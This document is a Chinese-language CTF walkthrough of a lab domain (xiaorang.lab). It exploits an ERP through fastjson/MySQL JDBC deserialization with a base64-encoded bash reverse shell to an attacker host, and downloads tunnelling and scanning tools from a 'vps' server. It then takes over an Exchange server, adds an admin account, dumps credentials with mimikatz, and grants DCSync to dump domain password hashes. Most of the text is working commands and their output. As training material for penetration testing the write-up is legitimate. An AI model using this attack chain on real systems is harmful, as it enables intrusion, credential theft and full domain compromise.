目录
flag1
fscan64 -h 39.99.245.230
F:\渗透工具\fscan>fscan64 -h 39.99.136.97
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 39.99.136.97 is alive
[*] Icmp alive hosts len is: 1
39.99.136.97:8000 open
39.99.136.97:22 open
39.99.136.97:80 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://39.99.136.97 code:200 len:19813 title:lumia
[*] WebTitle: http://39.99.136.97:8000 code:302 len:0 title:None 跳转url: http://39.99.136.97:8000/login.html
[*] WebTitle: http://39.99.136.97:8000/login.html code:200 len:5662 title:Lumia ERP
打8000端口,admin/123456登录
华夏ERP,找找漏洞,可以打jdbc
漏洞点是这里,参考这篇文章来打
fastjson 反序列化之mysql JDBC 利用_隐形卟的博客-CSDN博客
http://39.99.231.160:8000/user/list?search=
下载mysql fake server来打
改一下config.json
{
"config":{
"ysoserialPath":"ysoserial-all.jar",
"javaBinPath":"java",
"fileOutputDir":"./fileOutput/",
"displayFileContentOnScreen":true,
"saveToFile":true
},
"fileread":{
"win_ini":"c:\\windows\\win.ini",
"win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
"win":"c:\\windows\\",
"linux_passwd":"/etc/passwd",
"linux_hosts":"/etc/hosts",
"index_php":"index.php",
"ssrf":"https://www.baidu.com/",
"__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
},
"yso":{
"Jdk7u21":["Jdk7u21","calc"],
"CommonsCollections6":["CommonCollections6","bash -c {echo,YmFzaCAtaSAmIC9kZXYvdGNwLzQ5LjIzMy4xMjEuNTMvNTQ=}|{base64,-d}|{bash,-i}"]
}
}
payload
反弹shell
bash -i >& /dev/tcp/ip/54 0>&1
{
"name": {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "vps",
"portToConnectTo": 88,
"info": {
"user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2..0IDA+JjE=}|{base64,-d}|{bash,-i}",
"password": "pass",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
}
}
}
用bp,url编码后发送
拿到第一个flag
flag2
传一下工具
wget http://vps:port/frpc
wget http://vps:port/frpc.ini
wget http://vps:port/fscan
./fscan -h 172.22.3.12/24
./fscan -h 172.22.3.12/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.3.12 is alive
(icmp) Target 172.22.3.2 is alive
(icmp) Target 172.22.3.9 is alive
(icmp) Target 172.22.3.26 is alive
[*] Icmp alive hosts len is: 4
172.22.3.12:8000 open
172.22.3.9:8172 open
172.22.3.26:445 open
172.22.3.9:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.26:139 open
172.22.3.9:139 open
172.22.3.2:139 open
172.22.3.26:135 open
172.22.3.9:135 open
172.22.3.2:135 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.9:808 open
172.22.3.2:88 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo:
[*]172.22.3.9
[->]XIAORANG-EXC01
[->]172.22.3.9
[*] NetInfo:
[*]172.22.3.2
[->]XIAORANG-WIN16
[->]172.22.3.2
[*] WebTitle: http://172.22.3.12 code:200 len:19813 title:lumia
[*] NetBios: 172.22.3.2 [+]DC XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] 172.22.3.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.3.26 XIAORANG\XIAORANG-PC
[*] WebTitle: http://172.22.3.12:8000 code:302 len:0 title:None 跳转url: http://172.22.3.12:8000/login.html
[*] NetInfo:
[*]172.22.3.26
[->]XIAORANG-PC
[->]172.22.3.26
[*] WebTitle: http://172.22.3.12:8000/login.html code:200 len:5662 title:Lumia ERP
[*] NetBios: 172.22.3.9 XIAORANG-EXC01.xiaorang.lab LWindows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle: https://172.22.3.9:8172 code:404 len:0 title:None
[*] WebTitle: http://172.22.3.9 code:403 len:0 title:None
[*] WebTitle: https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook
已完成 18/18
[*] 扫描结束,耗时: 17.743568947s
整理一下
172.22.3.12 本机
172.22.3.2 XIAORANG-WIN16 DC
172.22.3.9 XIAORANG-EXC01 Exchange
172.22.3.26 XIAORANG-PC
挂个代理
vps:
./frps -c frps.ini
靶机:
./frpc -c frpc.ini
打172.22.3.9,有个outlook
https://172.22.3.9/owa/
用exp直接打,盲猜邮件后缀是xiaorang.lab
proxychains python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab
然后加个用户
net user test Abcd1234 /add
net localgroup administrators test /add
远程连接一下,拿到flag
flag4
上传个mimikatz抓取一下
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 12291656 (00000000:00bb8e48)
Session : RemoteInteractive from 3
User Name : test
Domain : XIAORANG-EXC01
Logon Server : XIAORANG-EXC01
Logon Time : 2023/10/2 11:37:10
SID : S-1-5-21-804691931-3750513266-524628342-1000
msv :
[00000003] Primary
* Username : test
* Domain : XIAORANG-EXC01
* NTLM : c780c78872a102256e946b3ad238f661
* SHA1 : bc4e7d2a003b79bb6ffdfff949108220c1fad373
tspkg :
wdigest :
* Username : test
* Domain : XIAORANG-EXC01
* Password : (null)
kerberos :
* Username : test
* Domain : XIAORANG-EXC01
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 12284385 (00000000:00bb71e1)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/2 11:37:09
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55808f50f5667934c73c555eab651b32
* SHA1 : 1316650c559ddc86c9357cc811112caa486b7867
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : ab aa 2d c1 76 2e 67 2a a6 76 25 63 97 9b e8 49 ed 20 08 3e f5 8c 39 3e a6 d3 c4 32 50 c6 68 e4 5c 65 a3 65 f7 c6 27 5d 27 b6 b7 75 9b 12 0e a2 00 35 32 d7 57 58 67 1a 3a 44 aa 87 7b a1 72 69 8f bb d1 c0 d0 27 0b 44 24 de 13 e8 a9 04 87 ca 6c 47 f8 d4 d7 ac d1 cb 0e 54 8c 53 d7 8f bb 5a 1a eb f7 a9 88 36 d7 05 74 18 26 6b e7 a4 11 dd d2 39 4a c5 08 6a aa 64 b1 40 a0 ac 0f d2 da a8 66 36 68 16 42 71 d7 ad 13 dd 03 e0 9f 01 2d 7c 93 c0 c9 87 e3 ee b1 1f 7f 58 aa ab 51 b8 c1 d0 19 ae a4 22 3a 31 84 01 94 af 13 28 b6 73 49 f8 03 73 ec cd 14 34 e0 ee 06 f7 e1 c0 c4 60 44 98 45 1c c1 36 8c e2 8b eb ed 09 3e 48 92 95 f3 c5 a8 96 f4 57 ff 1f e3 f8 ca af 84 43 36 87 36 4f 46 07 25 4c 3a d5 4a da 21 e3 1c bf 58 ec db 8d
ssp :
credman :
Authentication Id : 0 ; 9504868 (00000000:00910864)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2023/10/2 11:08:02
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55808f50f5667934c73c555eab651b32
* SHA1 : 1316650c559ddc86c9357cc811112caa486b7867
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : ab aa 2d c1 76 2e 67 2a a6 76 25 63 97 9b e8 49 ed 20 08 3e f5 8c 39 3e a6 d3 c4 32 50 c6 68 e4 5c 65 a3 65 f7 c6 27 5d 27 b6 b7 75 9b 12 0e a2 00 35 32 d7 57 58 67 1a 3a 44 aa 87 7b a1 72 69 8f bb d1 c0 d0 27 0b 44 24 de 13 e8 a9 04 87 ca 6c 47 f8 d4 d7 ac d1 cb 0e 54 8c 53 d7 8f bb 5a 1a eb f7 a9 88 36 d7 05 74 18 26 6b e7 a4 11 dd d2 39 4a c5 08 6a aa 64 b1 40 a0 ac 0f d2 da a8 66 36 68 16 42 71 d7 ad 13 dd 03 e0 9f 01 2d 7c 93 c0 c9 87 e3 ee b1 1f 7f 58 aa ab 51 b8 c1 d0 19 ae a4 22 3a 31 84 01 94 af 13 28 b6 73 49 f8 03 73 ec cd 14 34 e0 ee 06 f7 e1 c0 c4 60 44 98 45 1c c1 36 8c e2 8b eb ed 09 3e 48 92 95 f3 c5 a8 96 f4 57 ff 1f e3 f8 ca af 84 43 36 87 36 4f 46 07 25 4c 3a d5 4a da 21 e3 1c bf 58 ec db 8d
ssp :
credman :
Authentication Id : 0 ; 9178843 (00000000:008c0edb)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/2 10:56:45
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : 1cd648d40b93bdf2afe2f47eb571bb75
* SHA1 : eb1decff81e81c01572c4cda7b7281308b4be309
* DPAPI : b667e8a4f66a4a8b5b7465f9620fe92a
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 2471407 (00000000:0025b5ef)
Session : RemoteInteractive from 2
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/2 10:18:13
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/10/2 10:16:03
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 63498 (00000000:0000f80a)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/2 10:16:01
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55808f50f5667934c73c555eab651b32
* SHA1 : 1316650c559ddc86c9357cc811112caa486b7867
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : ab aa 2d c1 76 2e 67 2a a6 76 25 63 97 9b e8 49 ed 20 08 3e f5 8c 39 3e a6 d3 c4 32 50 c6 68 e4 5c 65 a3 65 f7 c6 27 5d 27 b6 b7 75 9b 12 0e a2 00 35 32 d7 57 58 67 1a 3a 44 aa 87 7b a1 72 69 8f bb d1 c0 d0 27 0b 44 24 de 13 e8 a9 04 87 ca 6c 47 f8 d4 d7 ac d1 cb 0e 54 8c 53 d7 8f bb 5a 1a eb f7 a9 88 36 d7 05 74 18 26 6b e7 a4 11 dd d2 39 4a c5 08 6a aa 64 b1 40 a0 ac 0f d2 da a8 66 36 68 16 42 71 d7 ad 13 dd 03 e0 9f 01 2d 7c 93 c0 c9 87 e3 ee b1 1f 7f 58 aa ab 51 b8 c1 d0 19 ae a4 22 3a 31 84 01 94 af 13 28 b6 73 49 f8 03 73 ec cd 14 34 e0 ee 06 f7 e1 c0 c4 60 44 98 45 1c c1 36 8c e2 8b eb ed 09 3e 48 92 95 f3 c5 a8 96 f4 57 ff 1f e3 f8 ca af 84 43 36 87 36 4f 46 07 25 4c 3a d5 4a da 21 e3 1c bf 58 ec db 8d
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : XIAORANG-EXC01$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/10/2 10:15:51
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xiaorang-exc01$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 9160712 (00000000:008bc808)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/2 10:56:14
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : 1cd648d40b93bdf2afe2f47eb571bb75
* SHA1 : eb1decff81e81c01572c4cda7b7281308b4be309
* DPAPI : b667e8a4f66a4a8b5b7465f9620fe92a
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 2407818 (00000000:0024bd8a)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/2 10:18:11
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55808f50f5667934c73c555eab651b32
* SHA1 : 1316650c559ddc86c9357cc811112caa486b7867
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : ab aa 2d c1 76 2e 67 2a a6 76 25 63 97 9b e8 49 ed 20 08 3e f5 8c 39 3e a6 d3 c4 32 50 c6 68 e4 5c 65 a3 65 f7 c6 27 5d 27 b6 b7 75 9b 12 0e a2 00 35 32 d7 57 58 67 1a 3a 44 aa 87 7b a1 72 69 8f bb d1 c0 d0 27 0b 44 24 de 13 e8 a9 04 87 ca 6c 47 f8 d4 d7 ac d1 cb 0e 54 8c 53 d7 8f bb 5a 1a eb f7 a9 88 36 d7 05 74 18 26 6b e7 a4 11 dd d2 39 4a c5 08 6a aa 64 b1 40 a0 ac 0f d2 da a8 66 36 68 16 42 71 d7 ad 13 dd 03 e0 9f 01 2d 7c 93 c0 c9 87 e3 ee b1 1f 7f 58 aa ab 51 b8 c1 d0 19 ae a4 22 3a 31 84 01 94 af 13 28 b6 73 49 f8 03 73 ec cd 14 34 e0 ee 06 f7 e1 c0 c4 60 44 98 45 1c c1 36 8c e2 8b eb ed 09 3e 48 92 95 f3 c5 a8 96 f4 57 ff 1f e3 f8 ca af 84 43 36 87 36 4f 46 07 25 4c 3a d5 4a da 21 e3 1c bf 58 ec db 8d
ssp :
credman :
Authentication Id : 0 ; 104351 (00000000:0001979f)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/2 10:16:03
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 63531 (00000000:0000f82b)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/2 10:16:01
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 9587463cfa3fd1ea760c401e2c52e224
* SHA1 : 162fc915ffccfa73c6f53b3c92f02690ccf7831c
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 12 ae e6 f2 22 80 c0 a3 cd 84 c9 94 de ef 96 52 79 ff ea 99 f6 9c 67 48 10 08 e7 99 1a fa 51 11 ad b6 c1 79 cc 6d 04 b2 22 01 47 b0 53 b5 7e ff df 04 21 34 ae 7b ee c9 cf b1 c1 d3 c0 63 d3 d7 6a f2 3a 38 83 ac cf d2 93 7b d3 0b bb d6 a5 8d 7c cd f1 77 65 0b 8c 77 dd 98 49 3c 21 f0 5d fc a7 8f c7 e0 5b f7 96 4d d2 46 14 81 8f 4f a7 a4 27 11 09 03 f9 f4 0d ce 71 4d 8d 64 c3 a9 6b 5c 4a 77 ba ac 33 1a 49 60 11 bd 4d b2 1e 98 05 1a c1 03 5b c6 cf 4e 1c d3 83 10 52 51 68 c4 b1 e0 65 c2 36 f3 a6 3f 66 c6 95 8c 3d 47 ab 9b cb 35 bd 53 f0 6f 13 ae 48 28 5e cf 5b ee 45 ce 7f 10 47 aa e6 f0 d3 09 c0 b3 ad ef 24 00 c5 c8 f0 7f a5 06 93 0e f5 a4 2a ec d0 25 96 4d a4 88 d3 55 94 d9 94 81 ef 8b ba 9e 89 b6 36 dc 88 64 8d 96
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : XIAORANG-EXC01$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/10/2 10:16:01
SID : S-1-5-20
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55808f50f5667934c73c555eab651b32
* SHA1 : 1316650c559ddc86c9357cc811112caa486b7867
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xiaorang-exc01$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 22388 (00000000:00005774)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/10/2 10:15:51
SID :
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55808f50f5667934c73c555eab651b32
* SHA1 : 1316650c559ddc86c9357cc811112caa486b7867
tspkg :
wdigest :
kerberos :
ssp :
[00000000]
* Username : HealthMailbox0d5918ea7298475bbbb7e3602e1e289d@xiaorang.lab
* Domain : (null)
* Password : G|de+X;PlwqESy9Q0Hl&mkcBDd6j_MQwV!}KncBv660V${lM:bX9UFU-d|E?V/(/UxDlw/ciO)Zg#_l3=7Vo&ShOt;sY1+M6mXmm2::$)&@KrDqIrRz3dtmKn;VKbQdT
[00000001]
* Username : HealthMailbox0d5918ea7298475bbbb7e3602e1e289d@xiaorang.lab
* Domain : (null)
* Password : G|de+X;PlwqESy9Q0Hl&mkcBDd6j_MQwV!}KncBv660V${lM:bX9UFU-d|E?V/(/UxDlw/ciO)Zg#_l3=7Vo&ShOt;sY1+M6mXmm2::$)&@KrDqIrRz3dtmKn;VKbQdT
credman :
Authentication Id : 0 ; 12291627 (00000000:00bb8e2b)
Session : RemoteInteractive from 3
User Name : test
Domain : XIAORANG-EXC01
Logon Server : XIAORANG-EXC01
Logon Time : 2023/10/2 11:37:10
SID : S-1-5-21-804691931-3750513266-524628342-1000
msv :
[00000003] Primary
* Username : test
* Domain : XIAORANG-EXC01
* NTLM : c780c78872a102256e946b3ad238f661
* SHA1 : bc4e7d2a003b79bb6ffdfff949108220c1fad373
tspkg :
wdigest :
* Username : test
* Domain : XIAORANG-EXC01
* Password : (null)
kerberos :
* Username : test
* Domain : XIAORANG-EXC01
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 12284408 (00000000:00bb71f8)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/2 11:37:09
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55808f50f5667934c73c555eab651b32
* SHA1 : 1316650c559ddc86c9357cc811112caa486b7867
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : ab aa 2d c1 76 2e 67 2a a6 76 25 63 97 9b e8 49 ed 20 08 3e f5 8c 39 3e a6 d3 c4 32 50 c6 68 e4 5c 65 a3 65 f7 c6 27 5d 27 b6 b7 75 9b 12 0e a2 00 35 32 d7 57 58 67 1a 3a 44 aa 87 7b a1 72 69 8f bb d1 c0 d0 27 0b 44 24 de 13 e8 a9 04 87 ca 6c 47 f8 d4 d7 ac d1 cb 0e 54 8c 53 d7 8f bb 5a 1a eb f7 a9 88 36 d7 05 74 18 26 6b e7 a4 11 dd d2 39 4a c5 08 6a aa 64 b1 40 a0 ac 0f d2 da a8 66 36 68 16 42 71 d7 ad 13 dd 03 e0 9f 01 2d 7c 93 c0 c9 87 e3 ee b1 1f 7f 58 aa ab 51 b8 c1 d0 19 ae a4 22 3a 31 84 01 94 af 13 28 b6 73 49 f8 03 73 ec cd 14 34 e0 ee 06 f7 e1 c0 c4 60 44 98 45 1c c1 36 8c e2 8b eb ed 09 3e 48 92 95 f3 c5 a8 96 f4 57 ff 1f e3 f8 ca af 84 43 36 87 36 4f 46 07 25 4c 3a d5 4a da 21 e3 1c bf 58 ec db 8d
ssp :
credman :
Authentication Id : 0 ; 2407791 (00000000:0024bd6f)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/2 10:18:11
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55808f50f5667934c73c555eab651b32
* SHA1 : 1316650c559ddc86c9357cc811112caa486b7867
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : ab aa 2d c1 76 2e 67 2a a6 76 25 63 97 9b e8 49 ed 20 08 3e f5 8c 39 3e a6 d3 c4 32 50 c6 68 e4 5c 65 a3 65 f7 c6 27 5d 27 b6 b7 75 9b 12 0e a2 00 35 32 d7 57 58 67 1a 3a 44 aa 87 7b a1 72 69 8f bb d1 c0 d0 27 0b 44 24 de 13 e8 a9 04 87 ca 6c 47 f8 d4 d7 ac d1 cb 0e 54 8c 53 d7 8f bb 5a 1a eb f7 a9 88 36 d7 05 74 18 26 6b e7 a4 11 dd d2 39 4a c5 08 6a aa 64 b1 40 a0 ac 0f d2 da a8 66 36 68 16 42 71 d7 ad 13 dd 03 e0 9f 01 2d 7c 93 c0 c9 87 e3 ee b1 1f 7f 58 aa ab 51 b8 c1 d0 19 ae a4 22 3a 31 84 01 94 af 13 28 b6 73 49 f8 03 73 ec cd 14 34 e0 ee 06 f7 e1 c0 c4 60 44 98 45 1c c1 36 8c e2 8b eb ed 09 3e 48 92 95 f3 c5 a8 96 f4 57 ff 1f e3 f8 ca af 84 43 36 87 36 4f 46 07 25 4c 3a d5 4a da 21 e3 1c bf 58 ec db 8d
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/10/2 10:16:01
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
mimikatz(commandline) # exit
Bye!
这里整理一下
Zhangtong
22c7f81993e96ac83ac2f3f1903de8b4
XIAORANG-EXC01$
55808f50f5667934c73c555eab651b32
Exchange 机器账户默认对域内成员具有 WriteDACL 权限, 因此可以写 DCSync
也可以用BloodHound收集信息,然后看出来。
proxychains python3 bloodyAD.py -d xiaorang.lab -u 'XIAORANG-EXC01$' -p :55808f50f5667934c73c555eab651b32 --host 172.22.3.2 add dcsync Zhangtong
dump hash
proxychains impacket-secretsdump xiaorang.lab/XIAORANG-EXC01\$@172.22.3.2 -hashes :55808f50f5667934c73c555eab651b32 -just-dc
└─# proxychains impacket-secretsdump xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20230817.32422.a769683f - Copyright 2023 Fortra
[proxychains] Strict chain ... vps:5002 ... 172.22.3.2:445 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... vps:5002 ... 172.22.3.2:135 ... OK
[proxychains] Strict chain ... vps:5002 ... 172.22.3.2:49668 ... OK
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\$431000-7AGO1IPPEUGJ:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_46bc0bcd781047eba:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2554056e362e45ba9:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_ae8e35b0ca3e41718:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_341e33a8ba4d46c19:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_3d52038e2394452f8:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2ddd7a0d26c84e7cb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_015b052ab8324b3fa:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_9bd6f16aa25343e68:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:6f7486339dcfbfc0f94d0e3dc3716feb:::
xiaorang.lab\HealthMailbox0d5918e:1136:aad3b435b51404eeaad3b435b51404ee:1cd648d40b93bdf2afe2f47eb571bb75:::
xiaorang.lab\HealthMailboxeda7a84:1137:aad3b435b51404eeaad3b435b51404ee:1e89e23e265bb7b54dc87938b1b1a131:::
xiaorang.lab\HealthMailbox33b01cf:1138:aad3b435b51404eeaad3b435b51404ee:0eff3de35019c2ee10b68f48941ac50d:::
xiaorang.lab\HealthMailbox9570292:1139:aad3b435b51404eeaad3b435b51404ee:e434c7db0f0a09de83f3d7df25ec2d2f:::
xiaorang.lab\HealthMailbox3479a75:1140:aad3b435b51404eeaad3b435b51404ee:c43965ecaa92be22c918e2604e7fbea0:::
xiaorang.lab\HealthMailbox2d45c5b:1141:aad3b435b51404eeaad3b435b51404ee:4822b67394d6d93980f8e681c452be21:::
xiaorang.lab\HealthMailboxec2d542:1142:aad3b435b51404eeaad3b435b51404ee:147734fa059848c67553dc663782e899:::
